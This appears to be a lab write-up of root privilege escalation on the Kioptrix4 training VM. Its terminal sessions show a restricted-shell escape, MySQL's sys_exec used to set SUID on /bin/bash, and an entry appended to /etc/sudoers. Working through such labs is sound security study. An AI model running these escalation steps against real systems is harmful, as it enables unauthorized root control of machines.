######################## METHOD ONE ####################################### 
Usually after rooting these boxes, I explore the net to find out how others 
did it, it is always exciting to see how different methodologies used are:

root@noondi:~# ssh john@192.168.209.184
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=115(admin),1001(john)
john@Kioptrix4:~$                                                                                                                               
john@Kioptrix4:~$ 
john@Kioptrix4:~$ 
john@Kioptrix4:~$ mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 17
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

#####################################################
Set the "Set-User-ID" bit of /bin/bash, so 
that anyone who attempts to access that file does so 
as if they are the owner of the file.
####################################################
mysql> select sys_exec('chmod u+s /bin/bash');
+---------------------------------+
| sys_exec('chmod u+s /bin/bash') |
+---------------------------------+
| NULL                            | 
+---------------------------------+
1 row in set (0.01 sec)

mysql> exit
Bye
john@Kioptrix4:~$ ls -a /bin/bash
/bin/bash
john@Kioptrix4:~$                                                              
john@Kioptrix4:~$ 
john@Kioptrix4:~$ 
john@Kioptrix4:~$ 
john@Kioptrix4:~$  ls -l /bin/bash
-rwsr-xr-x 1 root root 702160 2008-05-12 14:33 /bin/bash
john@Kioptrix4:~$ 
john@Kioptrix4:~$ 
john@Kioptrix4:~$ 
john@Kioptrix4:~$ bash -p
bash-3.2# 
bash-3.2# 
bash-3.2# whoami
root
bash-3.2# 
bash-3.2# 
bash-3.2# id
uid=1001(john) gid=1001(john) euid=0(root) groups=115(admin),1001(john)
bash-3.2# 


++++++++++++you can also unset the above  mysql command+++++++++++++
#####################################################
chmod u+s /bin/bash: 
Set the "Set-User-ID" bit of /bin/bash, so 
that anyone who attempts to access that file does so 
as if they are the owner of the file.

The opposite of the above command is below; un-sets the SUID bit.
####################################################

mysql> select sys_exec('chmod u-s /bin/bash');     
+---------------------------------+
| sys_exec('chmod u-s /bin/bash') |
+---------------------------------+
| NULL                            | 
+---------------------------------+
1 row in set (0.00 sec)

mysql> exit
Bye
john@Kioptrix4:~$ 
john@Kioptrix4:~$ 
john@Kioptrix4:~$ ls -a /bin/bash
/bin/bash
john@Kioptrix4:~$ ls -l /bin/bash
-rwxr-xr-x 1 root root 702160 2008-05-12 14:33 /bin/bash
john@Kioptrix4:~$ 
john@Kioptrix4:~$ 
john@Kioptrix4:~$ bash -p
john@Kioptrix4:~$ exit
exit
john@Kioptrix4:~$ bash -p        
john@Kioptrix4:~$ 


######################## METHOD TWO ####################################### 
mysql> use mysql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select sys_exec("echo 'robert ALL=(ALL) ALL'>> /etc/sudoers");
+--------------------------------------------------------+
| sys_exec("echo 'robert ALL=(ALL) ALL'>> /etc/sudoers") |
+--------------------------------------------------------+
|                                                      0 |
+--------------------------------------------------------+
1 row in set (0.01 sec)

mysql> exit
Bye
robert@Kioptrix4:~$ sudo bash
[sudo] password for robert:
root@Kioptrix4:~# id
uid=0(root) gid=0(root) groups=0(root)

